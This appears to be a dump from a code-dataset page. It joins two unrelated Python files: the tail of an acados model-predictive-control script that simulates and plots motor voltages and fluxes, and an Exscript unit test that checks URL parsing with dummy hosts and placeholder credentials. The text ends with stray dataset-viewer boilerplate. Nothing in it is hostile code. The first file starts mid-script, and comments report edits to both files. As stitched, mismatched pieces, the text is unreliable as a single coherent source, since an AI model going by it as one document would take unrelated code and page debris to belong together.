nlp_con.idxbu = nmp.array([1])
nlp_con.lbu = lbu
nlp_con.ubu = ubu
if FORMULATION > 0:
    # voltage sphere: h = u_d^2 + u_q^2 <= (u_max*sqrt(3)/2)^2
    nlp_con.lh = nmp.array([-1.0e8])
    nlp_con.uh = nmp.array([(u_max*sqrt(3)/2)**2])
# initial condition: machine starts at zero flux
nlp_con.x0 = nmp.array([0.0, -0.0])
if FORMULATION == 0 or FORMULATION == 2:
    # setting general constraints
    # lg <= D*u + C*u <= ug
    nlp_con.D = D
    nlp_con.C = C
    nlp_con.lg = lg
    nlp_con.ug = ug
# nlp_con.C_e = ...
# nlp_con.lg_e = ...
# nlp_con.ug_e = ...
# setting parameters: [speed w, dist_d, dist_q]
nlp_con.p = nmp.array([w_val, 0.0, 0.0])
# set constants
# ra.constants = []
# set QP solver
ra.solver_config.qp_solver = 'PARTIAL_CONDENSING_HPIPM'
# ra.solver_config.qp_solver = 'FULL_CONDENSING_HPIPM'
# ra.solver_config.qp_solver = 'FULL_CONDENSING_QPOASES'
ra.solver_config.hessian_approx = 'GAUSS_NEWTON'
# ra.solver_config.integrator_type = 'ERK'
# implicit integrator: the model is an implicit DAE
ra.solver_config.integrator_type = 'IRK'
# set prediction horizon
ra.solver_config.tf = Tf
ra.solver_config.nlp_solver_type = 'SQP_RTI'
# ra.solver_config.nlp_solver_type = 'SQP'
# set header path
ra.acados_include_path = '/usr/local/include'
ra.acados_lib_path = '/usr/local/lib'
file_name = 'acados_ocp.json'
if CODE_GEN == 1:
    # generate the solver, passing the constraint objects for FORMULATION 1/2
    if FORMULATION == 0:
        acados_solver = generate_solver(model, ra, json_file = file_name)
    if FORMULATION == 1:
        acados_solver = generate_solver(model, ra, con_h=constraint, json_file = file_name)
    if FORMULATION == 2:
        acados_solver = generate_solver(model, ra, con_h=constraint, con_p=constraint_nl, json_file = file_name)
if COMPILE == 1:
    # make
    os.chdir('c_generated_code')
    os.system('make')
    os.system('make shared_lib')
    os.chdir('..')
# closed loop simulation TODO(add proper simulation)
Nsim = 100
simX = nmp.ndarray((Nsim, nx))
simU = nmp.ndarray((Nsim, nu))
for i in range(Nsim):
    status = acados_solver.solve()
    # record the first-stage state and control of the solution
    x0 = acados_solver.get(0, "x")
    u0 = acados_solver.get(0, "u")
    for j in range(nx):
        simX[i,j] = x0[j]
    for j in range(nu):
        simU[i,j] = u0[j]
    # shift: reuse the second-stage state as the next initial condition
    # (the original repeated this get/set block twice and set an unused
    # `field_name` variable; the redundant duplicate and the dead variable
    # were removed — behavior is unchanged)
    x0 = acados_solver.get(1, "x")
    acados_solver.set(0, "lbx", x0)
    acados_solver.set(0, "ubx", x0)
# plot results
t = nmp.linspace(0.0, Ts*Nsim, Nsim)
# 4 stacked time plots: u_d, u_q, psi_d, psi_q with their references (dashed)
plt.subplot(4, 1, 1)
plt.step(t, simU[:,0], color='r')
plt.plot([0, Ts*Nsim], [nlp_cost.yref[2], nlp_cost.yref[2]], '--')
plt.title('closed-loop simulation')
plt.ylabel('u_d')
plt.xlabel('t')
plt.grid(True)
plt.subplot(4, 1, 2)
plt.step(t, simU[:,1], color='r')
plt.plot([0, Ts*Nsim], [nlp_cost.yref[3], nlp_cost.yref[3]], '--')
plt.ylabel('u_q')
plt.xlabel('t')
plt.grid(True)
plt.subplot(4, 1, 3)
plt.plot(t, simX[:,0])
plt.plot([0, Ts*Nsim], [nlp_cost.yref[0], nlp_cost.yref[0]], '--')
plt.ylabel('psi_d')
plt.xlabel('t')
plt.grid(True)
plt.subplot(4, 1, 4)
plt.plot(t, simX[:,1])
plt.plot([0, Ts*Nsim], [nlp_cost.yref[1], nlp_cost.yref[1]], '--')
plt.ylabel('psi_q')
plt.xlabel('t')
plt.grid(True)
# plot hexagon
# (same edge construction as in get_general_constraints_DC)
r = u_max
x1 = r
y1 = 0
x2 = r*cos(pi/3)
y2 = r*sin(pi/3)
q1 = -(y2 - y1/x1*x2)/(1-x2/x1)
m1 = -(y1 + q1)/x1
# q1 <= uq + m1*ud <= -q1
# q1 <= uq - m1*ud <= -q1
# box constraints
m2 = 0
q2 = r*sin(pi/3)
# -q2 <= uq <= q2
plt.figure()
plt.plot(simU[:,0], simU[:,1], 'o')
plt.xlabel('ud')
plt.ylabel('uq')
# the four slanted hexagon edges and the two horizontal ones
ud = nmp.linspace(-1.5*u_max, 1.5*u_max, 100)
plt.plot(ud, -m1*ud -q1)
plt.plot(ud, -m1*ud +q1)
plt.plot(ud, +m1*ud -q1)
plt.plot(ud, +m1*ud +q1)
plt.plot(ud, -q2*nmp.ones((100, 1)))
plt.plot(ud, q2*nmp.ones((100, 1)))
plt.grid(True)
ax = plt.gca()
ax.set_xlim([-1.5*u_max, 1.5*u_max])
ax.set_ylim([-1.5*u_max, 1.5*u_max])
# inscribed voltage sphere used by FORMULATION 1/2
circle = plt.Circle((0, 0), u_max*nmp.sqrt(3)/2, color='red', fill=False)
ax.add_artist(circle)
plt.show()
|
# tests/Exscript/util/urlTest.py
from builtins import str
import sys
import unittest
import re
import os.path
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..', '..'))
from Exscript.util.url import Url
# (input, canonical string) pairs exercised by the test cases below.
# BUG FIX: three inputs had been corrupted by a '<PASSWORD>' redaction
# placeholder; restored to 'password2', matching their expected outputs.
urls = [
    # No protocol.
    ('testhost',
     'telnet://testhost:23'),
    ('testhost?myvar=testvalue',
     'telnet://testhost:23?myvar=testvalue'),
    # No protocol + empty user.
    ('@testhost',
     'telnet://@testhost:23'),
    ('@testhost?myvar=testvalue',
     'telnet://@testhost:23?myvar=testvalue'),
    # No protocol + user.
    ('user@testhost',
     'telnet://user@testhost:23'),
    ('user:password@testhost',
     'telnet://user:password@testhost:23'),
    ('user:password:password2@testhost',
     'telnet://user:password:password2@testhost:23'),
    # No protocol + empty password 1.
    ('user:@testhost',
     'telnet://user:@testhost:23'),
    ('user::password2@testhost',
     'telnet://user::password2@testhost:23'),
    (':@testhost',
     'telnet://:@testhost:23'),
    # No protocol + empty password 2.
    ('user:password:@testhost',
     'telnet://user:password:@testhost:23'),
    ('user::@testhost',
     'telnet://user::@testhost:23'),
    ('::@testhost',
     'telnet://::@testhost:23'),
    (':password:@testhost',
     'telnet://:password:@testhost:23'),
    # Protocol.
    ('ssh1://testhost',
     'ssh1://testhost:22'),
    ('ssh1://testhost?myvar=testvalue',
     'ssh1://testhost:22?myvar=testvalue'),
    # Protocol + empty user.
    ('ssh://@testhost',
     'ssh://@testhost:22'),
    ('ssh://:password@testhost',
     'ssh://:password@testhost:22'),
    ('ssh://:password:password2@testhost',
     'ssh://:password:password2@testhost:22'),
    # Protocol + user.
    ('ssh://user@testhost',
     'ssh://user@testhost:22'),
    ('ssh://user@testhost?myvar=testvalue',
     'ssh://user@testhost:22?myvar=testvalue'),
    ('ssh://user:password@testhost',
     'ssh://user:password@testhost:22'),
    ('ssh://user:password@testhost?myvar=testvalue',
     'ssh://user:password@testhost:22?myvar=testvalue'),
    ('ssh://user:password@testhost',
     'ssh://user:password@testhost:22'),
    ('ssh://user:password:password2@testhost',
     'ssh://user:password:password2@testhost:22'),
    # Multiple arguments.
    ('ssh://user:password@testhost?myvar=testvalue&myvar2=test%202',
     'ssh://user:password@testhost:22?myvar=testvalue&myvar2=test+2'),
    ('ssh://user:password@testhost?myvar=testvalue&myvar2=test%202',
     'ssh://user:password@testhost:22?myvar=testvalue&myvar2=test+2'),
    # Encoding.
    ('foo://%27M%7B7Zk:%27%2FM%7B7Zyk:C7%26Rt%3Ea@ULM-SZRC1:23',
     'foo://%27M%7B7Zk:%27%2FM%7B7Zyk:C7%26Rt%3Ea@ULM-SZRC1:23'),
    # Pseudo protocol.
    ('pseudo://../my/path',
     'pseudo://../my/path'),
    ('pseudo://../path',
     'pseudo://../path'),
    ('pseudo://filename',
     'pseudo://filename'),
    ('pseudo:///abspath',
     'pseudo:///abspath'),
    ('pseudo:///abs/path',
     'pseudo:///abs/path'),
]
class urlTest(unittest.TestCase):
    """Round-trip tests for Exscript.util.url.Url parsing and formatting."""
    CORRELATE = Url

    def _describe(self, url, result, expected):
        # Build the readable failure message for one (input, expected) pair.
        return ('URL: ' + url + '\n'
                + 'Result: ' + str(result) + '\n'
                + 'Expected: ' + expected)

    def testConstructor(self):
        self.assertIsInstance(Url(), Url)

    def testToString(self):
        for url, expected in urls:
            result = Url.from_string(url)
            error = self._describe(url, result, expected)
            self.assertIsInstance(result, Url, error)
            self.assertEqual(result.to_string(), expected, error)

    def testFromString(self):
        for url, expected in urls:
            result = Url.from_string(url)
            error = self._describe(url, result, expected)
            self.assertIsInstance(result, Url)
            self.assertTrue(str(result) == expected, error)
def suite():
    """Return a TestSuite containing all urlTest cases."""
    loader = unittest.TestLoader()
    return loader.loadTestsFromTestCase(urlTest)
if __name__ == '__main__':
    # Allow running this test module directly from the command line.
    unittest.TextTestRunner(verbosity=2).run(suite())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.